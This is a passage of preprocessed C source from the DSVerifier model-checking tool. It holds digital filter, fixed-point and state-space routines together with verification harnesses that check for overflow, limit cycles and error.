generic_timer += ((70 * hw.assembly.mov) + (65 * hw.assembly.ldd) + (12 * hw.assembly.lsl) + (12 * hw.assembly.rol) + (15 * hw.assembly.std) + (6 * hw.assembly.add) + (6 * hw.assembly.adc) + (2 * hw.assembly.adiw) + (3 * hw.assembly.cpc) + (3 * hw.assembly.cp) + (5 * hw.assembly.ld) + (4 * hw.assembly.rcall) + (5 * hw.assembly.subi) + (3 * hw.assembly.rjmp) + (2 * hw.assembly.brlt) + (3 * hw.assembly.st) + (2 * hw.assembly.sbci) + (3 * hw.assembly.sbc) + (1 * hw.assembly.brge));
}
generic_timer += ((4 * hw.assembly.ldd) + (4 * hw.assembly.mov) + (8 * hw.assembly.pop) + (3 * hw.assembly.out) + (1 * hw.assembly.in) + (1 * hw.assembly.cli) + (1 * hw.assembly.adiw) + (1 * hw.assembly.ret));
return yout;
}
void double_direct_form_1_impl2(double x[], int x_size, double b[], int b_size, double a[], int a_size, double y[]){
int i = 0; int j = 0;
double v[x_size];
for(i = 0; i < x_size; i++){
v[i] = 0;
for(j = 0; j < b_size; j++){
if (j > i) break;
v[i] = v[i] + x[i-j] * b[j];
}
}
y[0] = v[0];
for(i = 1; i < x_size; i++){
y[i] = 0;
y[i] = y[i] + v[i];
for(j = 1; j < a_size; j++){
if (j > i) break;
y[i] = y[i] + y[i-j] * ((-1) * a[j]);
}
}
}
void fxp_direct_form_1_impl2(fxp_t x[], int x_size, fxp_t b[], int b_size, fxp_t a[], int a_size, fxp_t y[]){
int i = 0; int j = 0;
fxp_t v[x_size];
for(i = 0; i < x_size; i++){
v[i] = 0;
for(j = 0; j < b_size; j++){
if (j > i) break;
v[i] = fxp_add(v[i], fxp_mult(x[i-j], b[j]));
}
}
y[0] = v[0];
for(i = 1; i < x_size; i++){
y[i] = 0;
y[i] = fxp_add(y[i], v[i]);
for(j = 1; j < a_size; j++){
if (j > i) break;
y[i] = fxp_add(y[i], fxp_mult(y[i-j] , -a[j]));
}
}
}
# 26 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/delta-operator.h" 1
# 19 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/delta-operator.h"
# 1 "/usr/include/assert.h" 1 3 4
# 20 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/delta-operator.h" 2
# 1 "/usr/include/assert.h" 1 3 4
# 23 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/delta-operator.h" 2
int nchoosek(int n, int k){
if (k == 0)
return 1;
return (n * nchoosek(n - 1, k - 1)) / k;
}
void generate_delta_coefficients(double vetor[], double out[], int n, double delta){
int i,j;
int N = n - 1;
double sum_delta_operator;
for(i=0; i<=N; i++)
{
sum_delta_operator = 0;
for(j=0; j<=i; j++)
{
sum_delta_operator = sum_delta_operator + vetor[j]*nchoosek(N-j,i-j);
}
out[i] = internal_pow(delta,N-i)*sum_delta_operator;
}
}
void get_delta_transfer_function(double b[], double b_out[], int b_size, double a[], double a_out[], int a_size, double delta){
generate_delta_coefficients(b, b_out, b_size, delta);
generate_delta_coefficients(a, a_out, a_size, delta);
}
void get_delta_transfer_function_with_base(double b[], double b_out[], int b_size, double a[], double a_out[], int a_size, double delta){
int i,j;
int N = a_size - 1;
int M = b_size - 1;
double sum_delta_operator;
for(i=0; i<=N; i++)
{
sum_delta_operator = 0;
for(j=0; j<=i; j++)
{
sum_delta_operator = sum_delta_operator + a[j]*nchoosek(N-j,i-j);
}
a_out[i] = internal_pow(delta,N-i)*sum_delta_operator;
}
for(i=0; i<=M; i++)
{
sum_delta_operator = 0;
for(j=0; j<=i; j++)
{
sum_delta_operator = sum_delta_operator + b[j]*nchoosek(M-j,i-j);
}
b_out[i] = internal_pow(delta,M-i)*sum_delta_operator;
}
}
# 27 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/closed-loop.h" 1
# 28 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/closed-loop.h"
void ft_closedloop_series(double c_num[], int Nc_num, double c_den[], int Nc_den, double model_num[], int Nmodel_num, double model_den[], int Nmodel_den, double ans_num[], int Nans_num, double ans_den[], int Nans_den){
Nans_num = Nc_num + Nmodel_num - 1;
Nans_den = Nc_den + Nmodel_den - 1 ;
double den_mult [Nans_den];
poly_mult(c_num, Nc_num, model_num, Nmodel_num, ans_num, Nans_num);
poly_mult(c_den, Nc_den, model_den, Nmodel_den, den_mult, Nans_den );
poly_sum(ans_num, Nans_num , den_mult, Nans_den , ans_den, Nans_den);
}
void ft_closedloop_sensitivity(double c_num[], int Nc_num, double c_den[], int Nc_den, double model_num[], int Nmodel_num, double model_den[], int Nmodel_den, double ans_num[], int Nans_num, double ans_den[], int Nans_den){
int Nans_num_p = Nc_num + Nmodel_num-1;
Nans_den = Nc_den + Nmodel_den-1;
Nans_num = Nc_den + Nmodel_den-1;
double num_mult [Nans_num_p];
poly_mult(c_den, Nc_den, model_den, Nmodel_den, ans_num, Nans_num);
poly_mult(c_num, Nc_num, model_num, Nmodel_num, num_mult, Nans_num_p);
poly_sum(ans_num, Nans_num, num_mult, Nans_num_p, ans_den, Nans_den);
}
void ft_closedloop_feedback(double c_num[], int Nc_num, double c_den[], int Nc_den, double model_num[], int Nmodel_num, double model_den[], int Nmodel_den, double ans_num[], int Nans_num, double ans_den[], int Nans_den){
Nans_num = Nc_den + Nmodel_num - 1;
Nans_den = Nc_den + Nmodel_den - 1;
int Nnum_mult = Nc_num + Nmodel_num - 1;
double den_mult [Nans_den];
double num_mult [Nnum_mult];
poly_mult(c_num, Nc_num, model_num, Nmodel_num, num_mult, Nnum_mult);
poly_mult(c_den, Nc_den, model_den, Nmodel_den, den_mult, Nans_den);
poly_sum(num_mult, Nnum_mult, den_mult, Nans_den, ans_den, Nans_den);
poly_mult(c_den, Nc_den, model_num, Nmodel_num, ans_num, Nans_num);
}
int check_stability_closedloop(double a[], int n, double plant_num[], int p_num_size, double plant_den[], int p_den_size){
int columns = n;
double m[2 * n - 1][n];
int i,j;
int first_is_positive = 0;
double * p_num = plant_num;
double * p_den = plant_den;
double sum = 0;
for (i=0; i < n; i++){
sum += a[i];
}
__DSVERIFIER_assert(sum > 0);
sum = 0;
for (i=0; i < n; i++){
sum += a[i] * internal_pow(-1, n-1-i);
}
sum = sum * internal_pow(-1, n-1);
__DSVERIFIER_assert(sum > 0);
__DSVERIFIER_assert(internal_abs(a[n-1]) < a[0]);
for (i=0; i < 2 * n - 1; i++){
for (j=0; j < columns; j++){
m[i][j] = 0;
if (i == 0){
m[i][j] = a[j];
continue;
}
if (i % 2 != 0 ){
int x;
for(x=0; x<columns;x++){
m[i][x] = m[i-1][columns-x-1];
}
columns = columns - 1;
j = columns;
}else{
__DSVERIFIER_assert(m[i-2][0] > 0);
m[i][j] = m[i-2][j] - (m[i-2][columns] / m[i-2][0]) * m[i-1][j];
__DSVERIFIER_assert((m[0][0] >= 0) && (m[i][0] >= 0));
}
}
}
return 1;
}
# 28 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/initialization.h" 1
# 17 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/initialization.h"
extern digital_system ds;
extern digital_system plant;
extern digital_system control;
extern implementation impl;
extern filter_parameters filter;
extern hardware hw;
void initialization(){
if (impl.frac_bits >= 32){
printf("impl.frac_bits must be less than word width!\n");
}
if (impl.int_bits >= 32 - impl.frac_bits){
printf("impl.int_bits must be less than word width subtracted by precision!\n");
# 33 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/initialization.h" 3 4
((void) sizeof ((
# 33 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/initialization.h"
0
# 33 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/initialization.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 33 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/initialization.h"
0
# 33 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/initialization.h" 3 4
) ; else __assert_fail (
# 33 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/initialization.h"
"0"
# 33 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/initialization.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/initialization.h", 33, __extension__ __PRETTY_FUNCTION__); }))
# 33 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/initialization.h"
;
}
if(impl.frac_bits >= 31){
_fxp_one = 0x7fffffff;
}else{
_fxp_one = (0x00000001 << impl.frac_bits);
}
_fxp_half = (0x00000001 << (impl.frac_bits - 1));
_fxp_minus_one = -(0x00000001 << impl.frac_bits);
_fxp_min = -(0x00000001 << (impl.frac_bits + impl.int_bits - 1));
_fxp_max = (0x00000001 << (impl.frac_bits + impl.int_bits - 1)) - 1;
_fxp_fmask = ((((int32_t) 1) << impl.frac_bits) - 1);
_fxp_imask = ((0x80000000) >> (32 - impl.frac_bits - 1));
_dbl_min = _fxp_min;
_dbl_min /= (1 << impl.frac_bits);
_dbl_max = _fxp_max;
_dbl_max /= (1 << impl.frac_bits);
if ((impl.scale == 0) || (impl.scale == 1)){
impl.scale = 1;
return;
}
if (impl.min != 0){
impl.min = impl.min / impl.scale;
}
if (impl.max != 0){
impl.max = impl.max / impl.scale;
}
# 80 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/initialization.h"
}
# 29 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/state-space.h" 1
# 19 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/state-space.h"
extern digital_system_state_space _controller;
extern int nStates;
extern int nInputs;
extern int nOutputs;
double double_state_space_representation(void){
double result1[4][4];
double result2[4][4];
int i, j;
for(i=0; i<4;i++){
for(j=0; j<4;j++){
result1[i][j]=0;
result2[i][j]=0;
}
}
double_matrix_multiplication(nOutputs,nStates,nStates,1,_controller.C,_controller.states,result1);
double_matrix_multiplication(nOutputs,nInputs,nInputs,1,_controller.D,_controller.inputs,result2);
double_add_matrix(nOutputs,
1,
result1,
result2,
_controller.outputs);
double_matrix_multiplication(nStates,nStates,nStates,1,_controller.A,_controller.states,result1);
double_matrix_multiplication(nStates,nInputs,nInputs,1,_controller.B,_controller.inputs,result2);
double_add_matrix(nStates,
1,
result1,
result2,
_controller.states);
return _controller.outputs[0][0];
}
double fxp_state_space_representation(void){
fxp_t result1[4][4];
fxp_t result2[4][4];
int i, j;
for(i=0; i<4;i++){
for(j=0; j<4;j++){
result1[i][j]=0;
result2[i][j]=0;
}
}
fxp_t A_fpx[4][4];
fxp_t B_fpx[4][4];
fxp_t C_fpx[4][4];
fxp_t D_fpx[4][4];
fxp_t states_fpx[4][4];
fxp_t inputs_fpx[4][4];
fxp_t outputs_fpx[4][4];
for(i=0; i<4;i++){
for(j=0; j<4;j++){
A_fpx[i][j]=0;
}
}
for(i=0; i<4;i++){
for(j=0; j<4;j++){
B_fpx[i][j]=0;
}
}
for(i=0; i<4;i++){
for(j=0; j<4;j++){
C_fpx[i][j]=0;
}
}
for(i=0; i<4;i++){
for(j=0; j<4;j++){
D_fpx[i][j]=0;
}
}
for(i=0; i<4;i++){
for(j=0; j<4;j++){
states_fpx[i][j]=0;
}
}
for(i=0; i<4;i++){
for(j=0; j<4;j++){
inputs_fpx[i][j]=0;
}
}
for(i=0; i<4;i++){
for(j=0; j<4;j++){
outputs_fpx[i][j]=0;
}
}
for(i=0; i<nStates;i++){
for(j=0; j<nStates;j++){
A_fpx[i][j]= fxp_double_to_fxp(_controller.A[i][j]);
}
}
for(i=0; i<nStates;i++){
for(j=0; j<nInputs;j++){
B_fpx[i][j]= fxp_double_to_fxp(_controller.B[i][j]);
}
}
for(i=0; i<nOutputs;i++){
for(j=0; j<nStates;j++){
C_fpx[i][j]= fxp_double_to_fxp(_controller.C[i][j]);
}
}
for(i=0; i<nOutputs;i++){
for(j=0; j<nInputs;j++){
D_fpx[i][j]= fxp_double_to_fxp(_controller.D[i][j]);
}
}
for(i=0; i<nStates;i++){
for(j=0; j<1;j++){
states_fpx[i][j]= fxp_double_to_fxp(_controller.states[i][j]);
}
}
for(i=0; i<nInputs;i++){
for(j=0; j<1;j++){
inputs_fpx[i][j]= fxp_double_to_fxp(_controller.inputs[i][j]);
}
}
for(i=0; i<nOutputs;i++){
for(j=0; j<1;j++){
outputs_fpx[i][j]= fxp_double_to_fxp(_controller.outputs[i][j]);
}
}
fxp_matrix_multiplication(nOutputs,nStates,nStates,1,C_fpx,states_fpx,result1);
fxp_matrix_multiplication(nOutputs,nInputs,nInputs,1,D_fpx,inputs_fpx,result2);
fxp_add_matrix(nOutputs,
1,
result1,
result2,
outputs_fpx);
fxp_matrix_multiplication(nStates,nStates,nStates,1,A_fpx,states_fpx,result1);
fxp_matrix_multiplication(nStates,nInputs,nInputs,1,B_fpx,inputs_fpx,result2);
fxp_add_matrix(nStates,
1,
result1,
result2,
states_fpx);
for(i=0; i<nStates;i++){
for(j=0; j<1;j++){
_controller.states[i][j]= fxp_to_double(states_fpx[i][j]);
}
}
for(i=0; i<nOutputs;i++){
for(j=0; j<1;j++){
_controller.outputs[i][j]= fxp_to_double(outputs_fpx[i][j]);
}
}
return _controller.outputs[0][0];
}
# 30 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/filter_functions.h" 1
# 20 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/filter_functions.h"
double sinTyl(double x, int precision){
double sine;
double xsquared = x*x;
double aux;
if (precision < 0)
{
printf("Warning: Function sinTyl from bmc/core/filter_functions.h: "
"Precision must be a positive integer. Assuming 0 precision\n");
precision = 0;
}
if (precision >= 0)
{
aux = 0;
sine = aux;
if (precision >= 1)
{
aux = x;
sine += aux;
if (precision >= 2)
{
aux = aux*xsquared;
sine -= aux/6;
if (precision >= 3)
{
aux = aux*xsquared;
sine +=aux/120;
if(precision >=4)
{
aux = aux*xsquared;
sine -=aux/5040;
if(precision >= 5)
{
aux = aux*xsquared;
sine +=aux/362880;
if(precision >= 6)
{
aux = aux*xsquared;
sine -=aux/39916800;
if (precision >= 7)
printf("Warning: Function sinTyl "
"from bmc/core/filter_functions.h: Precision "
"representation exceeded. Assuming maximum precision of 6\n");
}
}
}
}
}
}
}
return sine;
}
double cosTyl(double x, int precision){
double cosine;
double xsquared = x*x;
double aux;
if (precision < 0)
{
printf("Warning: Function cosTyl from bmc/core/filter_functions.h: "
"Precision must be a positive integer. Assuming 0 precision\n");
precision = 0;
}
if (precision >= 0)
{
aux = 0;
cosine = aux;
if (precision >= 1)
{
aux = 1;
cosine = 1;
if (precision >= 2)
{
aux = xsquared;
cosine -= aux/2;
if (precision >= 3)
{
aux = aux*xsquared;
cosine += aux/24;
if(precision >=4)
{
aux = aux*xsquared;
cosine -=aux/720;
if(precision >= 5)
{
aux = aux*xsquared;
cosine +=aux/40320;
if(precision >= 6)
{
aux = aux*xsquared;
cosine -=aux/3628800;
if (precision >= 7) printf("Warning: Function sinTyl "
"from bmc/core/filter_functions.h: Precision "
"representation exceeded. Assuming maximum precision of 6\n");
}
}
}
}
}
}
}
return cosine;
}
double atanTyl(double x, int precision){
double atangent;
double xsquared = x*x;
double aux;
if (precision < 0)
{
printf("Warning: Function sinTyl from bmc/core/filter_functions.h: "
"Precision must be a positive integer. Assuming 0 precision\n");
precision = 0;
}
if (precision >= 0)
{
aux = 0;
atangent = aux;
if (precision >= 1)
{
aux = x;
atangent = aux;
if (precision >= 2)
{
aux = xsquared;
atangent -= aux/3;
if (precision >= 3)
{
aux = aux*xsquared;
atangent += aux/5;
if(precision >=4)
{
aux = aux*xsquared;
atangent -=aux/7;
if (precision >= 7)
printf("Warning: Function sinTyl from bmc/core/filter_functions.h: "
"Precision representation exceeded. Assuming maximum precision of 4\n");
}
}
}
}
}
return atangent;
}
float sqrt1(const float x)
{
const float xhalf = 0.5f*x;
union
{
float x;
int i;
} u;
u.x = x;
u.i = 0x5f3759df - (u.i >> 1);
return x*u.x*(1.5f - xhalf*u.x*u.x);
}
float sqrt2(const float x)
{
union
{
int i;
float x;
} u;
u.x = x;
u.i = (1<<29) + (u.i >> 1) - (1<<22);
return u.x;
}
float fabsolut(float x)
{
if (x < 0)
x = -x;
return x;
}
static float sqrt3(float val)
{
float x = val/10;
float dx;
double diff;
double min_tol = 0.00001;
int i, flag;
flag = 0;
if (val == 0 ) x = 0;
else
{
for (i=1;i<20;i++)
{
if (!flag)
{
dx = (val - (x*x)) / (2.0 * x);
x = x + dx;
diff = val - (x*x);
if (fabsolut(diff) <= min_tol) flag = 1;
}
else x =x;
}
}
return (x);
}
# 31 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_overflow.h" 1
# 19 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_overflow.h"
int nondet_int();
float nondet_float();
extern digital_system ds;
extern implementation impl;
int verify_overflow(void) {
fxp_t a_fxp[ds.a_size];
fxp_t b_fxp[ds.b_size];
fxp_double_to_fxp_array(ds.a, a_fxp, ds.a_size);
fxp_double_to_fxp_array(ds.b, b_fxp, ds.b_size);
# 73 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_overflow.h"
fxp_t min_fxp = fxp_double_to_fxp(impl.min);
fxp_t max_fxp = fxp_double_to_fxp(impl.max);
fxp_t y[X_SIZE_VALUE];
fxp_t x[X_SIZE_VALUE];
int i;
for (i = 0; i < X_SIZE_VALUE; ++i) {
y[i] = 0;
x[i] = nondet_int();
__DSVERIFIER_assume(x[i] >= min_fxp && x[i] <= max_fxp);
}
int Nw = 0;
Nw = ds.a_size > ds.b_size ? ds.a_size : ds.b_size;
fxp_t yaux[ds.a_size];
fxp_t xaux[ds.b_size];
fxp_t waux[Nw];
for (i = 0; i < ds.a_size; ++i) {
yaux[i] = 0;
}
for (i = 0; i < ds.b_size; ++i) {
xaux[i] = 0;
}
for (i = 0; i < Nw; ++i) {
waux[i] = 0;
}
fxp_t xk, temp;
fxp_t *aptr, *bptr, *xptr, *yptr, *wptr;
int j;
for (i = 0; i < X_SIZE_VALUE; ++i) {
shiftL(x[i], xaux, ds.b_size);
y[i] = fxp_direct_form_1(yaux, xaux, a_fxp, b_fxp, ds.a_size, ds.b_size);
shiftL(y[i], yaux, ds.a_size);
# 174 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_overflow.h"
}
overflow_mode = 1;
fxp_verify_overflow_array(y, X_SIZE_VALUE);
return 0;
}
# 33 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h" 1
# 15 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h"
extern digital_system ds;
extern implementation impl;
extern digital_system_state_space _controller;
extern int nStates;
extern int nInputs;
extern int nOutputs;
int verify_limit_cycle_state_space(void){
double stateMatrix[4][4];
double outputMatrix[4][4];
double arrayLimitCycle[4];
double result1[4][4];
double result2[4][4];
int i, j, k;
for(i=0; i<4;i++){
for(j=0; j<4;j++){
result1[i][j]=0;
result2[i][j]=0;
stateMatrix[i][j]=0;
outputMatrix[i][j]=0;
}
}
double_matrix_multiplication(nOutputs,nStates,nStates,1,_controller.C,_controller.states,result1);
double_matrix_multiplication(nOutputs,nInputs,nInputs,1,_controller.D,_controller.inputs,result2);
double_add_matrix(nOutputs,
1,
result1,
result2,
_controller.outputs);
k = 0;
for (i = 1; i < 0; i++) {
double_matrix_multiplication(nStates,nStates,nStates,1,_controller.A,_controller.states,result1);
double_matrix_multiplication(nStates,nInputs,nInputs,1,_controller.B,_controller.inputs,result2);
double_add_matrix(nStates,
1,
result1,
result2,
_controller.states);
double_matrix_multiplication(nOutputs,nStates,nStates,1,_controller.C,_controller.states,result1);
double_matrix_multiplication(nOutputs,nInputs,nInputs,1,_controller.D,_controller.inputs,result2);
double_add_matrix(nOutputs,
1,
result1,
result2,
_controller.outputs);
int l;
for(l = 0; l < nStates; l++){
stateMatrix[l][k] = _controller.states[l][0];
}
for(l = 0; l < nOutputs; l++){
stateMatrix[l][k] = _controller.outputs[l][0];
}
k++;
}
printf("#matrix STATES -------------------------------");
print_matrix(stateMatrix,nStates,0);
printf("#matrix OUTPUTS -------------------------------");
print_matrix(outputMatrix,nOutputs,0);
# 93 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h" 3 4
((void) sizeof ((
# 93 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h"
0
# 93 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 93 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h"
0
# 93 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h" 3 4
) ; else __assert_fail (
# 93 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h"
"0"
# 93 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h", 93, __extension__ __PRETTY_FUNCTION__); }))
# 93 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h"
;
for(i=0; i<nStates;i++){
for(j=0; j<0;j++){
arrayLimitCycle[j] = stateMatrix[i][j];
}
double_check_persistent_limit_cycle(arrayLimitCycle,0);
}
for(i=0; i<nOutputs;i++){
for(j=0; j<0;j++){
arrayLimitCycle[j] = outputMatrix[i][j];
}
double_check_persistent_limit_cycle(arrayLimitCycle,0);
}
# 110 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h" 3 4
((void) sizeof ((
# 110 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h"
0
# 110 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 110 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h"
0
# 110 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h" 3 4
) ; else __assert_fail (
# 110 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h"
"0"
# 110 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h", 110, __extension__ __PRETTY_FUNCTION__); }))
# 110 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h"
;
}
int verify_limit_cycle(void){
overflow_mode = 3;
int i;
int Set_xsize_at_least_two_times_Na = 2 * ds.a_size;
printf("X_SIZE must be at least 2 * ds.a_size");
__DSVERIFIER_assert(X_SIZE_VALUE >= Set_xsize_at_least_two_times_Na);
fxp_t a_fxp[ds.a_size];
fxp_t b_fxp[ds.b_size];
fxp_double_to_fxp_array(ds.a, a_fxp, ds.a_size);
fxp_double_to_fxp_array(ds.b, b_fxp, ds.b_size);
# 168 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h"
fxp_t y[X_SIZE_VALUE];
fxp_t x[X_SIZE_VALUE];
fxp_t min_fxp = fxp_double_to_fxp(impl.min);
fxp_t max_fxp = fxp_double_to_fxp(impl.max);
fxp_t xaux[ds.b_size];
int nondet_constant_input = nondet_int();
__DSVERIFIER_assume(nondet_constant_input >= min_fxp && nondet_constant_input <= max_fxp);
for (i = 0; i < X_SIZE_VALUE; ++i) {
x[i] = nondet_constant_input;
y[i] = 0;
}
for (i = 0; i < ds.b_size; ++i) {
xaux[i] = nondet_constant_input;
}
int Nw = 0;
Nw = ds.a_size > ds.b_size ? ds.a_size : ds.b_size;
fxp_t yaux[ds.a_size];
fxp_t y0[ds.a_size];
fxp_t waux[Nw];
fxp_t w0[Nw];
for (i = 0; i < ds.a_size; ++i) {
yaux[i] = nondet_int();
__DSVERIFIER_assume(yaux[i] >= min_fxp && yaux[i] <= max_fxp);
y0[i] = yaux[i];
}
# 213 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h"
fxp_t xk, temp;
fxp_t *aptr, *bptr, *xptr, *yptr, *wptr;
int j;
for(i=0; i<X_SIZE_VALUE; ++i){
shiftL(x[i], xaux, ds.b_size);
y[i] = fxp_direct_form_1(yaux, xaux, a_fxp, b_fxp, ds.a_size, ds.b_size);
shiftL(y[i], yaux, ds.a_size);
# 278 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h"
}
fxp_check_persistent_limit_cycle(y, X_SIZE_VALUE);
return 0;
}
# 34 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error.h" 1
# 17 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error.h"
extern digital_system ds;
extern implementation impl;
int verify_error(void){
overflow_mode = 2;
double a_cascade[100];
int a_cascade_size;
double b_cascade[100];
int b_cascade_size;
fxp_t a_fxp[ds.a_size];
fxp_t b_fxp[ds.b_size];
fxp_double_to_fxp_array(ds.a, a_fxp, ds.a_size);
fxp_double_to_fxp_array(ds.b, b_fxp, ds.b_size);
# 69 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error.h"
fxp_t min_fxp = fxp_double_to_fxp(impl.min);
fxp_t max_fxp = fxp_double_to_fxp(impl.max);
fxp_t y[X_SIZE_VALUE];
fxp_t x[X_SIZE_VALUE];
double yf[X_SIZE_VALUE];
double xf[X_SIZE_VALUE];
int Nw = 0;
Nw = ds.a_size > ds.b_size ? ds.a_size : ds.b_size;
fxp_t yaux[ds.a_size];
fxp_t xaux[ds.b_size];
fxp_t waux[Nw];
double yfaux[ds.a_size];
double xfaux[ds.b_size];
double wfaux[Nw];
int i;
for (i = 0; i < ds.a_size; ++i) {
yaux[i] = 0;
yfaux[i] = 0;
}
for (i = 0; i < ds.b_size; ++i) {
xaux[i] = 0;
xfaux[i] = 0;
}
for (i = 0; i < Nw; ++i) {
waux[i] = 0;
wfaux[i] = 0;
}
for (i = 0; i < X_SIZE_VALUE; ++i) {
y[i] = 0;
x[i] = nondet_int();
__DSVERIFIER_assume(x[i] >= min_fxp && x[i] <= max_fxp);
yf[i] = 0.0f;
xf[i] = fxp_to_double(x[i]);
}
